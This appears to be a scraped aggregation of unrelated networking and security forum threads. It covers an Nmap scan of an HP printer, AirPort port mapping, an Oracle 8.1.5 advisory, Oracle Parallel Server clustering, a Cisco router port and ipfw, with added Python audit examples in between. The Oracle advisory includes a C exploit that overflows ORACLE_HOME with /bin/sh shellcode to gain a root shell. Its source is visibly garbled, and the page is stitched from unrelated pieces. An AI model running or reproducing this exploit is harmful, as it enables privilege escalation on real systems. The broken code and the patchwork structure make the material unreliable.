    Discovered open port 6839/tcp on 192.168.1.211
    Completed SYN Stealth Scan at 13:27, 5.25s elapsed (1000 total ports)
    Initiating UDP Scan at 13:27
    Scanning 192.168.1.211 [1000 ports]
    Discovered open port 137/udp on 192.168.1.211
    Completed UDP Scan at 13:27, 4.46s elapsed (1000 total ports)
    Initiating Service scan at 13:27
    Scanning 16 services on 192.168.1.211
    Discovered open port 161/udp on 192.168.1.211
    Discovered open|filtered port 161/udp on 192.168.1.211 is actually open
    Completed Service scan at 13:29, 82.51s elapsed (17 services on 1 host)
    Initiating OS detection (try #1) against 192.168.1.211
    NSE: Script scanning 192.168.1.211.
    Initiating NSE at 13:29
    Completed NSE at 13:30, 82.29s elapsed
    Nmap scan report for 192.168.1.211
    Host is up (0.023s latency).
    Not shown: 1983 closed ports
    PORT     STATE         SERVICE      VERSION
    80/tcp   open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    |_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
    | http-methods: GET POST PUT DELETE
    | Potentially risky methods: PUT DELETE
    |_See http://nmap.org/nsedoc/scripts/http-methods.html
    |_http-title: Site doesn't have a title (text/html).
    139/tcp  open          tcpwrapped
    443/tcp  open          ssl/http     HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    |_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
    | http-methods: GET POST PUT DELETE
    | Potentially risky methods: PUT DELETE
    |_See http://nmap.org/nsedoc/scripts/http-methods.html
    |_http-title: Site doesn't have a title (text/html).
    | ssl-cert: Subject: commonName=HPPS7525/organizationName=HP/stateOrProvinceName=Washington/countryName=US
    | Issuer: commonName=HPPS7525/organizationName=HP/stateOrProvinceName=Washington/countryName=US
    | Public Key type: rsa
    | Public Key bits: 1024
    | Not valid before: 2014-02-25T10:12:24+00:00
    | Not valid after:  2034-02-20T10:12:24+00:00
    | MD5:   9144 ca3b 557e 09cc aba0 8387 2732 2375
    |_SHA-1: a6b2 95c0 b72a 7201 578c 32de 662a e6fe b082 48ca
    |_ssl-date: 2014-03-21T13:30:09+00:00; -4h59m12s from local time.
    445/tcp  open          netbios-ssn
    631/tcp  open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    | http-methods: GET POST PUT DELETE
    | Potentially risky methods: PUT DELETE
    |_See http://nmap.org/nsedoc/scripts/http-methods.html
    6839/tcp open          tcpwrapped
    7435/tcp open          tcpwrapped
    8080/tcp open          http         HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    |_http-favicon: Unknown favicon MD5: 76C6E492CB8CC73A2A50D62176F205C9
    | http-methods: GET POST PUT DELETE
    | Potentially risky methods: PUT DELETE
    |_See http://nmap.org/nsedoc/scripts/http-methods.html
    |_http-title: Site doesn't have a title (text/html).
    9100/tcp open          jetdirect?
    9220/tcp open          hp-gsg       HP Generic Scan Gateway 1.0
    137/udp  open          netbios-ns   Samba nmbd (workgroup: HPPS7525)
    138/udp  open|filtered netbios-dgm
    161/udp  open          snmp         SNMPv1 server (public)
    | snmp-hh3c-logins:
    |_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
    | snmp-interfaces:
    |   Wifi0
    |     IP address: 192.168.1.211  Netmask: 255.255.255.0
    |     MAC address: a0:d3:c1:bd:c8:32 (Unknown)
    |     Type: ethernetCsmacd  Speed: 10 Mbps
    |     Status: up
    |_    Traffic stats: 6.16 Mb sent, 3.43 Mb received
    | snmp-netstat:
    |   TCP  0.0.0.0:7435         0.0.0.0:0
    |   TCP  192.168.1.211:56076  15.201.145.52:5222
    |   UDP  0.0.0.0:3702         *:*
    |   UDP  127.0.0.1:666        *:*
    |_  UDP  192.168.223.1:67     *:*
    | snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT
    |_  System uptime: 0 days, 3:34:23.28 (1286328 timeticks)
    | snmp-win32-shares:
    |_  baseoid: 1.3.6.1.4.1.77.1.2.27
    1022/udp open|filtered exp2
    1023/udp open|filtered unknown
    3702/udp open|filtered ws-discovery
    5355/udp open|filtered llmnr
    MAC Address: A0:D3:C1:BD:C8:32 (Unknown)
    Device type: general purpose
    Running: Wind River VxWorks
    OS CPE: cpe:/o:windriver:vxworks
    OS details: VxWorks
    Uptime guess: 0.150 days (since Fri Mar 21 09:55:04 2014)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=255 (Good luck!)
    IP ID Sequence Generation: Busy server or unknown class
    Service Info: Hosts: HPA0D3C1BDC832, HPPS7525; Device: printer; CPE: cpe:/h:hphotosmart_7520
    Host script results:
    | nbstat:
    |   NetBIOS name: HPA0D3C1BDC832, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
    |   Names
    |     HPA0D3C1BDC832<00>   Flags: <unique><active><permanent>
    |     MSHOME<00>           Flags: <group><active><permanent>
    |     HPA0D3C1BDC832<20>   Flags: <unique><active><permanent>
    |     HPPS7525<00>         Flags: <unique><active><permanent>
    |_    HPPS7525<20>         Flags: <unique><active><permanent>
    | smb-security-mode:
    |   Account that was used for smb scripts: guest
    |   User-level authentication
    |   SMB Security: Challenge/response passwords supported
    |_  Message signing disabled (dangerous, but default)
    TRACEROUTE
    HOP RTT      ADDRESS
    1   23.26 ms 192.168.1.211
    NSE: Script Post-scanning.
    Read data files from: F:\Progs\Nmap
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 180.90 seconds
               Raw packets sent: 2030 (74.829KB) | Rcvd: 2921 (149.377KB)
    +++++++++++++++++++++++++++++++++++++++++++++++++++++===
    Full TCP port scan without UDP scanning of all ports, showing up as open... * designates open and active.
    192.168.223.1Discovered open port 25/tcp on
    *192.168.223.1Discovered open port 80/tcp on
    *192.168.223.1Discovered open port 110/tcp on
    *192.168.223.1Discovered open port 119/tcp on
    *192.168.223.1Discovered open port 139/tcp on
    192.168.223.1Discovered open port 143/tcp on
    *192.168.223.1Discovered open port 443/tcp on
    *192.168.223.1Discovered open port 445/tcp on
    192.168.223.1Discovered open port 465/tcp on
    192.168.223.1Discovered open port 563/tcp on
    192.168.223.1Discovered open port 587/tcp on
    *192.168.223.1Discovered open port 631/tcp on
    192.168.223.1Discovered open port 993/tcp on
    192.168.223.1Discovered open port 995/tcp on
    *192.168.223.1Discovered open port 7435/tcp on
    *192.168.223.1Discovered open port 6839/tcp on
    *192.168.223.1Discovered open port 8080/tcp on
    192.168.223.1Discovered open port 8089/tcp on
    *192.168.223.1Discovered open port 9100/tcp on
    *192.168.223.1Discovered open port 9220/tcp on
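A scan like the one above becomes an exposure check for your own printer once its PORT table is compared with the services you actually need. The following is an added example, not part of the original post; the sample rows are constructed in the shape of the output above, and the `EXPECTED` allowlist (IPP and raw printing only) is an assumption.

```python
import re

# Constructed sample in the shape of the PORT table from the scan above
# (trimmed; NSE script output and traceroute lines must be skipped).
SAMPLE_SCAN = """\
PORT     STATE         SERVICE      VERSION
80/tcp   open          http         HP Photosmart 7520 series printer http config
| http-methods: GET POST PUT DELETE
|_http-title: Site doesn't have a title (text/html).
139/tcp  open          tcpwrapped
631/tcp  open          http         HP Photosmart 7520 series printer http config
9100/tcp open          jetdirect?
138/udp  open|filtered netbios-dgm
161/udp  open          snmp         SNMPv1 server (public)
1   23.26 ms 192.168.1.211
"""

# Assumption: this site only needs IPP (631/tcp) and raw printing (9100/tcp).
EXPECTED = {(631, "tcp"), (9100, "tcp")}

PORT_ROW = re.compile(r"^\s*(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_port_table(text):
    """Return one dict per row of an Nmap normal-output PORT table."""
    rows = []
    for line in text.splitlines():
        m = PORT_ROW.match(line)
        if not m:
            continue  # table header, NSE script output, traceroute hops
        port = int(m.group(1))
        if not 1 <= port <= 65535:
            continue
        rows.append({"port": port, "proto": m.group(2), "state": m.group(3),
                     "service": m.group(4), "version": m.group(5).strip()})
    return rows


def audit(rows, expected=EXPECTED):
    """Split rows into confirmed-open ports outside the allowlist,
    ports Nmap could not confirm (open|filtered), and notes."""
    report = {"unexpected_open": [], "unconfirmed": [], "notes": []}
    for r in rows:
        key = (r["port"], r["proto"])
        if r["state"] == "open":
            if key not in expected:
                report["unexpected_open"].append(key)
        elif "open" in r["state"].split("|"):
            report["unconfirmed"].append(key)
        # Nmap prints the community string that answered in parentheses.
        if r["service"] == "snmp" and "(public)" in r["version"]:
            report["notes"].append(
                f"{r['port']}/{r['proto']}: SNMP answers to community 'public'")
    return report


if __name__ == "__main__":
    result = audit(parse_port_table(SAMPLE_SCAN))
    for section, items in result.items():
        print(section, items)
```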

  • How do I open ports on my airport extreme and assign a fixed IP Address for a device connected to my network?

    I recently had a security system installed in my house.  One of the features is an EPAD which enables me to have a virtual keypad on my iphone, and computer to operate the alarm system.  The technician was not familiar with Mac's and Airports.  How do I open port 80 to 80 in my airport and assign a fixed IP address for the EPAD?  Apparently this is what is needed to make this work.

    There are three ranges of "strictly local" IP addresses reserved for local Network use:
    192.168.xxx.yyy
    172.16.xxx.yyy
    10.xxx.yyy.zzz
    What your Router does for you is to act as your agent on the Internet. Your requests are packaged up and forwarded on your behalf, and only when a response is expected is the response returned to your local IP address.
    Directing Network Traffic to a Specific Computer on Your Network (Port Mapping)
    AirPort Extreme uses Network Address Translation (NAT) to share a single IP address with the computers that join the AirPort Extreme network. To provide Internet access to several computers with one IP address, NAT assigns private IP addresses to each computer on the AirPort Extreme network, and then matches these addresses with port numbers. The wireless device creates a port-to-private IP address table entry when a computer on your AirPort (private) network sends a request for information to the Internet.
    If you’re using a web, AppleShare, or FTP server on your AirPort Extreme network, other computers initiate communication with your server. Because the Apple wireless device has no table entries for these requests, it has no way of directing the information to the appropriate computer on your AirPort network.
    To ensure that requests are properly routed to your web, AppleShare, or FTP server, you need to establish a permanent IP address for your server and provide inbound port mapping information to your Apple wireless device.
    To set up inbound port mapping:
    1) Open AirPort Utility, select your wireless device, and then choose Base Station > Manual Setup, or double-click the device icon to open its configuration in a separate window. Enter the password if necessary.
    2) Click the Advanced button, and then click Port Mapping.
    3) Click the Add button and choose a service, such as Personal File Sharing, from the Service pop-up menu.
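The table behaviour described above can be modelled in a few lines: outbound traffic creates an entry, unsolicited inbound traffic has none, and a port mapping is a permanent entry that any remote host can use. This is an added example, not Apple's code and not part of the original answer; the class, the addresses (documentation and private ranges) and the rule that a dynamic entry only accepts replies from the endpoint it was created for are assumptions of the model.

```python
class NatGateway:
    """Toy model of a NAT table with dynamic entries and static port mappings."""

    def __init__(self, public_ip, first_port=49152):
        self.public_ip = public_ip
        self._next_port = first_port
        # public_port -> (private_ip, private_port, remote_ip, remote_port)
        self.dynamic = {}
        # public_port -> (private_ip, private_port)
        self.static = {}

    def outbound(self, private_ip, private_port, remote_ip, remote_port):
        """A LAN host sends a request: create (or reuse) a table entry."""
        flow = (private_ip, private_port, remote_ip, remote_port)
        for public_port, entry in self.dynamic.items():
            if entry == flow:
                return (self.public_ip, public_port)
        while self._next_port in self.dynamic or self._next_port in self.static:
            self._next_port += 1
        public_port = self._next_port
        self._next_port += 1
        self.dynamic[public_port] = flow
        return (self.public_ip, public_port)

    def add_port_mapping(self, public_port, private_ip, private_port):
        """Inbound port mapping: a permanent entry for a server on the LAN."""
        self.static[public_port] = (private_ip, private_port)

    def inbound(self, remote_ip, remote_port, public_port):
        """Return the LAN destination for an inbound packet, or None (dropped)."""
        if public_port in self.static:
            # Static mappings do not check who is calling: every remote host
            # on the Internet reaches the mapped device.
            return self.static[public_port]
        entry = self.dynamic.get(public_port)
        if entry and entry[2:] == (remote_ip, remote_port):
            return entry[:2]  # expected reply to a request made from the LAN
        return None


def demo():
    nat = NatGateway("203.0.113.10")         # constructed public address
    laptop, server = "10.0.1.2", "10.0.1.201"  # constructed LAN hosts
    web = ("198.51.100.7", 443)
    stranger = ("192.0.2.99", 40000)

    _, public_port = nat.outbound(laptop, 51000, *web)
    results = {
        "reply_from_web": nat.inbound(*web, public_port),
        "stranger_to_dynamic_port": nat.inbound(*stranger, public_port),
        "stranger_to_80_before": nat.inbound(*stranger, 80),
    }
    nat.add_port_mapping(80, server, 80)
    results["stranger_to_80_after"] = nat.inbound(*stranger, 80)
    return results


if __name__ == "__main__":
    for name, destination in demo().items():
        print(f"{name}: {destination}")
```

The last result is the security-relevant one: once port 80 is mapped, the device behind it is reachable from any address, so it needs its own authentication and current firmware.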

  • Security vulnerability in Oracle 8.1.5

    The following email was forwarded to me about possible security vulnerabilities.
    I am looking for verification from both Oracle and the user community.
    ================================================================================
    [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
    ================================================================================
    File : Oracle 8.1.5
    SYSTEM : LINUX
    Tested by RedHat Linux 6.2
    INFO :
    There are two security vulnerabilities in Oracle.
    1. buffer overflow
    It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
    one of the environmental value of Oracle.
    Oracle applications that are vulnerable to buffer overflow are as follow :
    - names
    - namesctl
    - onrsd
    - osslogin
    - tnslsnr
    - tnsping
    - trcasst
    - trcroute
    These applications allow an attacker to execute a buffer overflow exploit.
    2. Log-files created
    When a user executes one of Oracle applications such as names, oracle or tnslsnr,
    following log files are created.
    names
    ======
    -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
    -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
    -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
    oracle
    ======
    -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
    tnslsnr
    =======
    -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
    SOLUTION
    Contact your vendor for a patch or close setuid permission.
    # su - oracle
    $ cd /oracle_8.1.5_install_directory/bin
    $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
    ==-------------------------------------------------------------------------------==
    * ** ** * [email protected] [yong-jun, kim]
    * ** ** * [ http://www.hackerslab.org ]
    ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==
    Oracle 8.1.5 exploit
    -by loveyou
    offset value : -500 ~ +500
    #include <stdio.h>
    #include <stdlib.h>
    #define BUFFER 800
    #define NOP 0x90
    #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d" /* jmp callz */
    /* start: */
    "\x5e" /* popl %esi */
    "\x29\xc0" /* subl %eax, %eax */
    "\x88\x46\x07" /* movb %al, 0x07(%esi) */
    "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
    "\xcd\x80" /* int $0x80 */
    "\x29\xc0" /* subl %eax, %eax */
    "\x40" /* incl %eax */
    "\xcd\x80" /* int $0x80 */
    /* callz: */
    "\xe8\xde\xff\xff\xff" /* call start */
    "/bin/sh";
    unsigned long getesp(void)
    __asm__("movl %esp,%eax");
    int main(int argc, char *argv[])
    char buff, ptr,binary[120];
    long *addr_ptr, addr;
    int bsize=BUFFER;
    int i,offset;
    offset = 0 ;
    if ( argc > 1 ) offset = atoi(argv[1]);
    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    memset(buff,bsize/2,NOP);
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode;
    buff[bsize - 1] = '\0';
    setenv("ORACLE_HOME",buff,1);
    printf("[ offset:%d buffer=%d ret:0x%x ]\n",
    offset,strlen(buff),addr);
    system(PATH);
    null
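The advisory's workaround is to remove the setuid permission from the eight listed programs. The check below reports which of them still carry a setuid or setgid bit and clears the bits the way `chmod a-s` does. It is an added example, not part of the forwarded advisory; the function names are hypothetical and the demo directory is constructed in a temporary location rather than a real Oracle install.

```python
import os
import stat
import tempfile

# Program names exactly as listed in the advisory above.
ADVISORY_BINARIES = ("names", "namesctl", "onrsd", "osslogin",
                     "tnslsnr", "tnsping", "trcasst", "trcroute")


def audit_setid(bin_dir, names=ADVISORY_BINARIES):
    """Map each listed program to 'setuid', 'setgid', 'setuid+setgid',
    'clean', 'missing' or 'not-regular-file'."""
    findings = {}
    for name in names:
        path = os.path.join(bin_dir, name)
        try:
            st = os.lstat(path)  # lstat: do not follow a planted symlink
        except FileNotFoundError:
            findings[name] = "missing"
            continue
        if not stat.S_ISREG(st.st_mode):
            findings[name] = "not-regular-file"
            continue
        bits = []
        if st.st_mode & stat.S_ISUID:
            bits.append("setuid")
        if st.st_mode & stat.S_ISGID:
            bits.append("setgid")
        findings[name] = "+".join(bits) if bits else "clean"
    return findings


def clear_setid(path):
    """Same effect as `chmod a-s path`: drop setuid and setgid, keep the rest."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_ISUID | stat.S_ISGID))


def demo():
    """Audit a constructed bin directory, apply the workaround, audit again."""
    with tempfile.TemporaryDirectory() as bin_dir:
        # Constructed stand-ins: one setuid file, one ordinary file.
        for name, mode in (("tnslsnr", 0o4755), ("tnsping", 0o755)):
            path = os.path.join(bin_dir, name)
            with open(path, "w") as fh:
                fh.write("placeholder\n")
            os.chmod(path, mode)
        before = audit_setid(bin_dir)
        for name, status in before.items():
            if status.startswith("set"):
                clear_setid(os.path.join(bin_dir, name))
        after = audit_setid(bin_dir)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for name in ADVISORY_BINARIES:
        print(f"{name:10s} before={before[name]:8s} after={after[name]}")
```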

    Hi Peter,
    I was told that Oracle8 and Oracle8i Parallel Server on IBM
    RS/6000 AIX comes with its own Lock Manager and this LM does not
    rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
    Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
    (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
    HACMP but came with a special LM.)
    Cluster-wide Filesystems are not used for OPS on Unix, as far as
    I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
    must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
    Logical Volumes on AIX).
    So I guess it should be possible for Oracle to port OPS to Linux.
    No special Cluster-Services would be needed for OPS on Linux,
    just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
    100BaseT).
    Peter Sechser (guest) wrote:
    : Dave,
    : Parallel Server needs some cluster services in order to
    : communicate between several nodes. So, the operating system has
    : to offer things like inter-node communication services,
    : cluster-wide lock communication services and a clusterwide
    : filesystem. I'm not quite sure, to what degree Linux offers/will
    : offer these services.
    : Peter

  • Open port 916/udp not closeable

    A nmap scan from the Internet (WAN) against a Cisco RV120W shows an open port 916/udp. This port remains open even if one writes an explicit access rule for the firewall.
    A quick googling shows that this port is probably used to access the firmware of the router from the outside as well as it has been involved in security problems some years ago. See http://osvdb.org/show/osvdb/34520
    How can this port be closed?
    Michael

    Dear Michael,
    Thank you for reaching the Small Business Support Community.
    I would first suggest you to upgrade to the latest firmware release version 1.0.4.10;
    http://software.cisco.com/download/release.html?mdfid=282981372&softwareid=282487380&release=1.0.4.10
    If nmap still shows the port opened, I then suggest you to disable the remote management to determine if this is the root of the problem, then contact the Small Business Support Center to have a TAC engineer figure this out;
    https://www.cisco.com/en/US/support/tsd_cisco_small_business_support_center_contacts.html
    Please do not hesitate to reach me back if there is anything I may assist you with.
    Kind regards,
    Jeffrey Rodriguez S. .:|:.:|:.
    Cisco Customer Support Engineer
    *Please rate the Post so others will know when an answer has been found.

  • Sudo ipfw list open port?

    So I did a "sudo ipfw list" in the terminal window and I got an open 63353 port. Naturally, I assumed that since my P2P software was just opened, and I said yes to the Leopard app firewall, it was this port number that was assigned to the P2P app.
    Now, I went into my router and also opened up the same corresponding number there (both tcp & udp).
    Still I'm getting a message saying the port is stealth.
    Am I correct in assuming that the Leo app firewall did open 63353 for P2P or does it conceal open ports from a sudo list command?
    Also, is the app firewall stealthing its open ports too? This would mean that if the router is set to stealth and app firewall is stealth, I get a double stealth port? huh does this make sense? I have never had to remove the "stealth ports" from the router before. There has been no prob on that end.
    Any help from apple would be greatly appreciated.

    I only enable my firewall on my laptop as it moves around and joins many different networks. That being said I have locked it down using the Application Firewall and IPFW.
    However my desktop computers in my office rely on the firewall my router provides. I use little snitch to firewall my outgoing connections and that is enough security for me.
    I will turn it off completely and just run the firewall on the router and hope it works like it used to. thx all.
    If you turn it off you can also flush out any IPFW rules with the command
    sudo ipfw flush

Maybe you are looking for